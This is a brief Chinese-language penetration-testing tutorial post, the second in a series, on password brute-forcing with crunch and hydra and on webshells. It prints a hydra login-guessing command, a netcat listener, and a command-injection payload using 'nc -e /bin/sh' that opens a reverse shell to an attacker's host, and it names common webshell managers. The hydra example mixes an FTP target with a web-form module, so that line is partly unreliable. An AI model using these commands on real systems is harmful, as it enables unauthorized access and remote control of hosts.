渗透测试常见技术 (2)

8.暴力破解
密码生成工具:kali中的crunch
暴力破解工具:hydra
hydra -l user -P passlist.txt ftp://192.168.0.1 http-post-form "/login.php:user=^USER^&pass=^PASS^:incorrect"
注意:大写参数表示使用字典,小写使用是特定字符(-l user--用户名是user;-L passlist.txt)

9.webshell

文件上传,文件包含,代码执行
代码执行:
kali中监听:nc -vv -l -p 8080
客户端:;或者 | nc -e /bin/sh "url" "port"

主要使用工具:冰蝎、菜刀、哥斯拉、蚁剑等。

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wpxjzp.html